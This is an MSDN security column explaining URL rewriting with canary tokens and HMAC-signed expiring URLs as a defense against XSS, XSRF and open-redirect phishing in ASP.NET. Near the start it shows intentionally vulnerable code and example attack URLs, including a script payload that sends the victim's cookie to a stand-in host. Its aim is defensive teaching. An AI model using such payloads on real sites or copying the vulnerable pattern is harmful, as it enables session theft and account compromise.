March 2009

Volume 24 Number 03

Security Briefs - Protect Your Site With URL Rewriting

By Bryan Sullivan | March 2009

Contents

Reviewing the Problem
A Possible Solution: Personalized Resource Locators
A Better Solution: Canary URLs
A Stateless Approach: Automatically Expiring URLs
Final Step
Some Caveats

Tim Berners-Lee once famously wrote that "cool URIs don't change." His opinion was that broken hyperlinks erode user confidence in an application and that URIs should be designed in such a way that they can remain unchanged for 200 years or more. While I understand his point, I'll venture to guess that when he made that statement he hadn't foreseen the ways in which hyperlinks would become a means for hackers to attack innocent users.

Attacks like cross-site scripting (XSS), cross-site request forgery (XSRF), and open-redirect phishing are routinely propagated through malicious hyperlinks sent in e-mail messages. (If you're unfamiliar with these attacks, I recommend reading about them at the Open Web Application Security Project (OWASP) Web site.) We could mitigate much of the risk of these vulnerabilities by frequently changing our URLs: not once every 200 years but once every 10 minutes. Attackers would no longer be able to exploit application vulnerabilities by mass e-mailing poisoned hyperlinks because the links would be broken and invalid by the time the messages reached their intended victims. With all due respect to Sir Tim, while "cool" URIs may not change, secure ones certainly do.

Reviewing the Problem

Before we get into the details of a solution, let's take a closer look at the problem. Here's a very simple example of some ASP.NET code vulnerable to an XSS attack:

protected void Page_Load(object sender, EventArgs e)
{
    // DO NOT USE - this is vulnerable code
    Response.Write("Welcome back, " + Request["username"]);
}

The code is vulnerable because the page is writing the username parameter from the request back into the response without any validation or encoding. An attacker could easily exploit this vulnerability by crafting a URL with script injected into the username parameter, such as:

page.aspx?username=<script>document.location='https://contoso.com/'+document.cookie;</script>

Now the attacker just needs to convince a victim to click on the link. Mass e-mails are an effective way to accomplish this, especially when a little social engineering is applied (for example, "Click here to receive your free Xbox 360!"). Similar malicious URLs can be constructed and e-mailed to exploit XSRF vulnerabilities:

checking.aspx?action=withdraw&amount=1000&destination=badguy

and open-redirect vulnerabilities:

page.aspx?redirect=https://evil.contoso.com

Open-redirect vulnerabilities are less well known than XSS and XSRF. They occur when an application allows a user to specify an arbitrary redirect URL in the request. This can lead to a phishing attack in which the user believes she is clicking a link that will take her to good.adatum.com, but in reality she will be redirected to evil.contoso.com.

A Possible Solution: Personalized Resource Locators

One possible solution to this problem is for an application to rewrite its URLs so that they are personalized for each user (or better yet, each user session). For example, an application could rewrite the URL contoso.com/page.aspx as contoso.com/{GUID}/page.aspx, where {GUID} is random and unique for each user session. Given that there are 2^128 possible GUID values, it is fantastically unlikely that an attacker would be able to guess a valid one, so presumably he would not be able to craft and e-mail a valid (and poisoned) URL.

ASP.NET already has similar functionality built in as part of its cookieless session-handling capability. Because some users can't or won't accept HTTP cookies, ASP.NET can be configured to store the user's session ID in the URL instead. You can enable this with a simple change to your web.config file:

<sessionState cookieless="true" />

On further inspection, however, we see that this approach does not really mitigate any of the security vulnerabilities that we're concerned about, like XSS. The attacker may not be able to guess a valid session GUID, but he doesn't actually have to. He can start his own session, get a valid session ID, and then lure a victim into using that session by e-mailing the URL.

Even though another user is using that session, the attacker is not prevented from using it simultaneously and stealing the victim's private data. The application has no accurate way to determine that two different people are using the same session—certainly it could check the incoming IP address, but there are many scenarios in which a single user's IP address changes legitimately from request to request or multiple users share the same IP address. This attack is called a session fixation attack and is one of the reasons why using cookieless session management is generally not recommended.

A Better Solution: Canary URLs

We can greatly improve the effectiveness of the personalized-URL approach by making one small change. Instead of using the URL to store the session ID, we store the session ID in a cookie as usual and use the URL to store a secret shared between the client and the server. We modify the URL rewriting code to store a per-session, unique, and random value both in session state and as part of the URL:

// create the shared secret
Guid secret = Guid.NewGuid();
Session["secret"] = secret;

// rewrite the URL to include the secret value
...

(The code required to actually rewrite the URL and parse incoming values is beyond the scope of this article. ASP.NET MVC can be used for this purpose, and Scott Guthrie has also blogged about ASP.NET URL rewriting techniques.)

On any request, we compare the value of the GUID stored in the URL to the one stored in session state. If they don't match, or if the GUID is missing from the URL, the request is considered malicious, it is blocked, and the originating IP address is logged. This shared-secret defense (also referred to as a canary defense) has long been the recommended approach to preventing XSRF attacks, but as you can see, it does a pretty good job of mitigating reflected XSS vulnerabilities as well by cutting off the e-mail propagation vector.
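The comparison described above might be sketched as follows. This is only an illustration: the class and method names are hypothetical, and it assumes the rewriting code has already extracted the token segment from the URL and read the stored secret from session state.

```csharp
using System;

public static class CanaryCheck
{
    // Returns true only when the URL token parses as a GUID and equals
    // the secret stored for the session. A missing token or a missing
    // session secret is treated as a failed check.
    public static bool IsValid(string urlToken, Guid? sessionSecret)
    {
        if (sessionSecret == null || string.IsNullOrEmpty(urlToken))
            return false;

        Guid parsed;
        if (!Guid.TryParse(urlToken, out parsed))
            return false;

        return parsed == sessionSecret.Value;
    }
}
```

A caller would block the request and log the originating IP address whenever IsValid returns false.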

It's important to note that this is not a complete solution against XSS. The best way to prevent XSS is to address the source of the problem by validating input and encoding output, but canaries can be applied as an additional layer of defense.
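As a rough sketch of the output-encoding half of that advice, the greeting from the vulnerable example could be built with the username HTML-encoded before it is written to the response. The Greeting class is a hypothetical helper; System.Net.WebUtility.HtmlEncode is used here so the sample stands alone outside of a Web project.

```csharp
using System.Net;

public static class Greeting
{
    // Encodes the user-supplied value so that markup characters are
    // rendered as text instead of being interpreted by the browser.
    public static string Build(string username)
    {
        return "Welcome back, " + WebUtility.HtmlEncode(username);
    }
}
```

With this change, a username of <script>alert(1)</script> is emitted as &lt;script&gt;alert(1)&lt;/script&gt; and displayed literally rather than executed.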

A Stateless Approach: Automatically Expiring URLs

While the canary URL approach is a good, secure methodology, it does have one weakness: it relies on server-side session state. If you have a stateless application, such as a Web service or a REST application, you probably won't want to enable session state only for the purpose of storing canary values.

In cases like these, you can accomplish your overall goal (preventing attackers from e-mailing malicious hyperlinks) without needing to maintain server-side session state by implementing automatically expiring URLs. A URL that expires a short period of time after it's requested (10 minutes or so) would greatly reduce the window of opportunity for an attacker to e-mail that URL to potential victims but still allow legitimate users sufficient time to work with the resource.

One way to put an expiration date on a URL is to rewrite the URL to include the current time stamp, like this:

https://www.contoso.com/{timestamp}/page.aspx

Whenever a user makes a request for the resource, the incoming time stamp in the URL is checked to see whether it's more than 10 minutes old (or whatever the specified time threshold is). If so, the request is denied. An alternative is to write the desired expiration time into the URL and then check that against the current time. However, both of these approaches as presented are flawed because an attacker could very easily forge a URL that would be valid at some point in the future:

https://www.contoso.com/{current timestamp + one hour}/page.aspx

This problem becomes even worse if you're using the URL to hold the expiration time stamp instead of the initial request time stamp because now the attacker can specify an arbitrarily distant point in the future and completely negate the defense:

https://www.contoso.com/{current timestamp + ten years}/page.aspx

The solution to this problem is to prevent attackers from tampering with the time stamp by also including a keyed hash of the time stamp in the URL as kind of a keyed-hash message authentication code (HMAC). The fact that you key the hash is critical: without this, an attacker could again specify a future time stamp, compute a hash value for it, and negate your defense. When you key the hash with a secret key, this is no longer possible.

While MD5 is a popular hash algorithm, it is no longer considered secure, as cryptography researchers have demonstrated ways to cause collisions and therefore break the algorithm. A better choice is one of the SHA-2 (Secure Hash Algorithm) functions such as SHA-256, which has not been successfully attacked as of this writing. SHA-256 is implemented by the Microsoft .NET Framework classes System.Security.Cryptography.SHA256Cng, SHA256CryptoServiceProvider, SHA256Managed, and HMACSHA256.

Any of these will work, but since the HMACSHA256 class has built-in functionality to apply a secret key value, it is the best choice:

HMACSHA256 hmac = new HMACSHA256(); // use a random key value

Using the default HMACSHA256 constructor applies a random key value to the hash, which should be sufficient for security, but this won't work in a server farm environment because each HMACSHA256 object will have a different key. If you are deploying your application in a farm, you need to explicitly specify the key in the constructor and make sure it's the same for all servers in the farm.
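For the farm scenario, a minimal sketch might look like the following. The FarmHmac class is hypothetical, and the sharedKey parameter is assumed to be loaded from protected configuration that is identical on every server; how the key is stored and distributed is outside the scope of this sample.

```csharp
using System;
using System.Security.Cryptography;

public static class FarmHmac
{
    // Computes the keyed hash of a time stamp with an explicitly supplied key,
    // so that every server holding the same key produces the same value.
    public static byte[] Sign(byte[] sharedKey, long ticks)
    {
        using (HMACSHA256 hmac = new HMACSHA256(sharedKey))
        {
            return hmac.ComputeHash(BitConverter.GetBytes(ticks));
        }
    }
}
```

Two calls with the same key and time stamp return identical 32-byte values, which is what allows one server to verify a URL issued by another.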

The next step is to write the time stamp along with the keyed hash into the URL. As an implementation detail, note that the output of the HMACSHA256.ComputeHash method is a byte array, but you will need to convert this to a URL-legal string because you will be writing it into the outgoing URL. This conversion is a little trickier than it sounds. Base64 is commonly used to convert arbitrary binary data into string text, but base64 contains characters like the equals sign (=) and the slash (/) that will cause parsing problems for ASP.NET even if they are URL encoded. Instead, you should convert binary data 1 byte at a time to a hexadecimal string, as shown in Figure 1.

Figure 1 Generating the Keyed Time Stamp

private static string convertToHex(byte[] data)
{
    // each byte becomes two hex digits
    System.Text.StringBuilder sb = new System.Text.StringBuilder(data.Length * 2);
    foreach (byte b in data)
        sb.AppendFormat("{0:X2}", (int)b);
    return sb.ToString();
}

private string generateKeyedTimestamp()
{
    // UTC avoids daylight-saving jumps and time-zone differences between servers
    long outgoingTicks = DateTime.UtcNow.Ticks;

    // get a SHA2 hash value of the timestamp
    byte[] timestampHash = this.hmac.ComputeHash(System.BitConverter.GetBytes(outgoingTicks));

    // return the current timestamp with the keyed hash value
    return outgoingTicks.ToString() + "-" + convertToHex(timestampHash);
}
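To illustrate why hexadecimal is the safer encoding here, the following sketch encodes the same bytes both ways. The EncodingDemo class is hypothetical, and BitConverter.ToString is used only as a compact alternative to the loop in Figure 1.

```csharp
using System;

public static class EncodingDemo
{
    // Standard base64 can emit '+', '/', and '=' characters.
    public static string ToBase64(byte[] data)
    {
        return Convert.ToBase64String(data);
    }

    // BitConverter.ToString yields "FB-FF"; removing the dashes
    // leaves only the characters 0-9 and A-F.
    public static string ToHex(byte[] data)
    {
        return BitConverter.ToString(data).Replace("-", "");
    }
}
```

For the two bytes 0xFB and 0xFF, ToBase64 returns "+/8=" while ToHex returns "FBFF", which contains nothing that needs escaping in a URL path.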

Finally, you must verify the incoming time stamp by recomputing its hash and making sure that it matches the incoming hash. The code is shown in Figure 2.

Figure 2 Verifying the Incoming Time Stamp

private static byte[] convertFromHex(string data)
{
    // we know that the hex string must have an even number of digits
    if ((data.Length % 2) != 0)
        throw new ArgumentException();

    // note: Convert.ToByte throws FormatException on non-hex input;
    // callers should treat any exception as a failed verification
    byte[] dataHex = new byte[data.Length / 2];
    for (int i = 0; i < data.Length; i = i + 2)
    {
        string hexByte = data.Substring(i, 2);
        dataHex[i / 2] = Convert.ToByte(hexByte, 16);
    }
    return dataHex;
}

private bool verifyKeyedTimestamp(long incomingTicks, string incomingHmac)
{
    if (String.IsNullOrEmpty(incomingHmac))
        return false;

    byte[] incomingHmacBytes = convertFromHex(incomingHmac);

    // recompute the hash and verify that it matches the passed-in value
    byte[] recomputedHmac = this.hmac.ComputeHash(BitConverter.GetBytes(incomingTicks));

    // perform byte-by-byte comparison on the arrays; compare the decoded
    // bytes (not the hex string, which is twice as long) to the recomputed hash
    if (incomingHmacBytes.Length != recomputedHmac.Length)
        return false;
    for (int i = 0; i < incomingHmacBytes.Length; i++)
    {
        if (incomingHmacBytes[i] != recomputedHmac[i])
            return false;
    }
    return true;
}
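Verifying the hash only proves that the time stamp was issued by the application; the age check described earlier still has to be applied. The following sketch puts both steps together. It is not the column's implementation: the ExpiringToken class, its constructor parameters, and the decision to pass the current time in as an argument (which makes the logic easy to test) are all assumptions made for illustration.

```csharp
using System;
using System.Globalization;
using System.Security.Cryptography;

public sealed class ExpiringToken
{
    private readonly byte[] key;        // assumed shared by all servers
    private readonly TimeSpan lifetime; // for example, 10 minutes

    public ExpiringToken(byte[] key, TimeSpan lifetime)
    {
        this.key = key;
        this.lifetime = lifetime;
    }

    // Produces "<ticks>-<hex HMAC of ticks>".
    public string Create(DateTime utcNow)
    {
        long ticks = utcNow.Ticks;
        return ticks.ToString(CultureInfo.InvariantCulture) + "-" + ToHex(Sign(ticks));
    }

    // Accepts a token only if its keyed hash matches and it has not expired.
    public bool IsValid(string token, DateTime utcNow)
    {
        if (string.IsNullOrEmpty(token)) return false;
        int dash = token.IndexOf('-');
        if (dash <= 0) return false;

        long ticks;
        if (!long.TryParse(token.Substring(0, dash), NumberStyles.None,
                           CultureInfo.InvariantCulture, out ticks))
            return false;

        // Compare the hex strings without exiting at the first mismatch.
        string expected = ToHex(Sign(ticks));
        string supplied = token.Substring(dash + 1);
        if (supplied.Length != expected.Length) return false;
        int diff = 0;
        for (int i = 0; i < expected.Length; i++)
            diff |= expected[i] ^ char.ToUpperInvariant(supplied[i]);
        if (diff != 0) return false;

        // Reject expired tokens. Future-dated tokens are rejected too;
        // a farm with clock skew may need a small tolerance here.
        long age = utcNow.Ticks - ticks;
        return age >= 0 && age <= lifetime.Ticks;
    }

    private byte[] Sign(long ticks)
    {
        using (HMACSHA256 hmac = new HMACSHA256(key))
        {
            return hmac.ComputeHash(BitConverter.GetBytes(ticks));
        }
    }

    private static string ToHex(byte[] data)
    {
        return BitConverter.ToString(data).Replace("-", "");
    }
}
```

A token created at noon with a 10-minute lifetime validates at 12:05 and fails at 12:11, and swapping in a later time stamp while keeping the original hash fails regardless of the time.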

Final Step

As a final step, whether you are using the canary approach or the automatic expiration approach, you need to designate one or more pages in your application as "landing pages" that can be accessed without the special URL token. Without this, no one will be able to use your application because there would be no way to make an initial valid request.

There are many ways in which you can designate landing pages, from hardcoding them in the rewriting module code (definitely not recommended) to specifying them in a web.config file (better), but my preferred approach is to use a custom attribute. Using a custom attribute reduces the amount of code you need to write and also allows for inheritance: you can define a LandingPage class and apply the custom attribute to that class, and then any page that derives from LandingPage will also be a landing page.

Start by defining a new custom attribute class called LandingPageAttribute. This class doesn't actually have to contain any methods or properties. You just need to be able to mark pages with this attribute and be able to programmatically determine whether a page is so marked:

public class LandingPageAttribute : Attribute { }

Now mark any page you want to use as a landing page with the LandingPage attribute, like this:

[LandingPage()]
public partial class HomePage : System.Web.UI.Page

Finally, in your URL verification code, check whether the requested handler has the custom attribute. If you're implementing your URL rewrite code as an HttpModule, you can use the code in Figure 3 to perform the check.

Figure 3 Checking for the Custom LandingPageAttribute

public class RewriteModule : IHttpModule
{
    public void Init(HttpApplication context)
    {
        context.PostMapRequestHandler += new EventHandler(context_PostMapRequestHandler);
    }

    // required by IHttpModule; this module holds nothing to release
    public void Dispose() { }

    void context_PostMapRequestHandler(object sender, EventArgs e)
    {
        HttpApplication application = sender as HttpApplication;
        if ((application == null) || (application.Context == null))
            return;

        // get the current request handler
        IHttpHandler httpHandler = application.Context.CurrentHandler;
        if (httpHandler == null)
            return;

        // reflect into the handler type to look for a LandingPageAttribute
        Type handlerType = httpHandler.GetType();
        object[] landingPageAttributes =
            handlerType.GetCustomAttributes(typeof(LandingPageAttribute), true);

        // allow access if we found any
        bool allowAccess = (landingPageAttributes.Length > 0);
        ...
    }
}
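The inheritance behavior mentioned earlier can be seen in a small stand-alone sketch. The LandingPageBase, HomePage, and AccountPage classes here are hypothetical plain classes standing in for real pages, and LandingPageCheck is a hypothetical helper that performs the same reflection call as Figure 3.

```csharp
using System;

public class LandingPageAttribute : Attribute { }

[LandingPage]
public class LandingPageBase { }            // marked base class

public class HomePage : LandingPageBase { } // inherits the marker
public class AccountPage { }                // not a landing page

public static class LandingPageCheck
{
    // Passing true as the second argument makes reflection search the
    // inheritance chain, so derived classes count as landing pages.
    public static bool IsLandingPage(object handler)
    {
        if (handler == null) return false;
        object[] found = handler.GetType()
            .GetCustomAttributes(typeof(LandingPageAttribute), true);
        return found.Length > 0;
    }
}
```

Here IsLandingPage returns true for a HomePage instance even though the attribute is applied only to its base class, and false for an AccountPage instance.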

Use the LandingPage attribute with caution. Not only are the rewriting defenses invalid for landing pages (because an attacker could simply remove the URL token), but one XSS vulnerability on a single landing page could jeopardize every page on the domain. An attacker could inject a series of XMLHttpRequest calls into the client-side script to programmatically determine a valid canary or time stamp and redirect his attack accordingly.

If possible, determine a single landing page for your application, and have that page immediately redirect to a URL-rewritten page after stripping out all querystring parameters. For example,

https://www.contoso.com/landingpage.aspx?a=b&c=d

would automatically redirect to

https://www.contoso.com/(token)/otherpage.aspx
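One way to build such a redirect target is sketched below. The LandingRedirect class and its parameters are hypothetical; the point is simply that nothing from the incoming path or querystring is carried over into the new URL.

```csharp
using System;

public static class LandingRedirect
{
    // Builds the redirect target from the scheme and host of the incoming
    // request only, discarding its path and querystring entirely.
    public static string BuildTarget(Uri incoming, string token, string page)
    {
        string root = incoming.GetLeftPart(UriPartial.Authority);
        return root + "/" + Uri.EscapeDataString(token) + "/" + page;
    }
}
```

Given the landing page URL shown above, a token of abc123, and a page of otherpage.aspx, BuildTarget returns https://www.contoso.com/abc123/otherpage.aspx.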

Some Caveats

Of course, URL rewriting may not be appropriate for all applications. One negative side effect of this approach is that although attackers are no longer able to e-mail malicious hyperlinks, legitimate users are similarly prevented from sending valid links or even from bookmarking pages in the application. Any page marked as a landing page could be bookmarked, but as I mentioned before, you need to be very cautious when using landing pages. Therefore, if you expect users of your application to bookmark pages other than the home page, URL rewriting is probably not a good solution for you.

Additionally, while URL rewriting is a fast and easy defense-in-depth mechanism, it is just that: defense-in-depth. It is by no means a silver bullet against XSS or any other attacks. An automatically expiring URL can still be exploited by an attacker with access to a Web server of his own. Instead of sending out malicious hyperlinks that point directly to the vulnerable page, he can send out hyperlinks that point to his own site. When his site gets a hit from one of the phished e-mails, it can contact a landing page on the vulnerable site to obtain a valid time stamp and then redirect the user accordingly.

URL rewriting does make the attacker's work more difficult: he now has to convince a user to follow a hyperlink to his Web site (evil.contoso.com) rather than a trusted one (www.msn.com), and he is also leaving a very clear trail back to himself for law enforcement agencies to follow. However, this will probably be of little comfort to any victims who fall for the phished e-mail and have their identities stolen as a result. Do use URL rewriting as an extra defensive measure, but always be sure to address vulnerabilities at the root of the problem.

Finally, I'd like to note that the techniques I've described in this article should not be construed as authoritative Microsoft development guidance. Please feel free to use them, but don't take them as Secure Development Lifecycle (SDL) requirements. We are currently conducting ongoing research in this area, and we would love to get your feedback. Please feel free to contact me at the SDL blog (blogs.msdn.com/sdl) with any comments.

Send your questions and comments to briefs@microsoft.com.

Bryan Sullivan is a Security Program Manager for the Microsoft Security Development Lifecycle team, where he specializes in Web application security issues. His first book, Ajax Security, was published by Addison-Wesley in December 2007.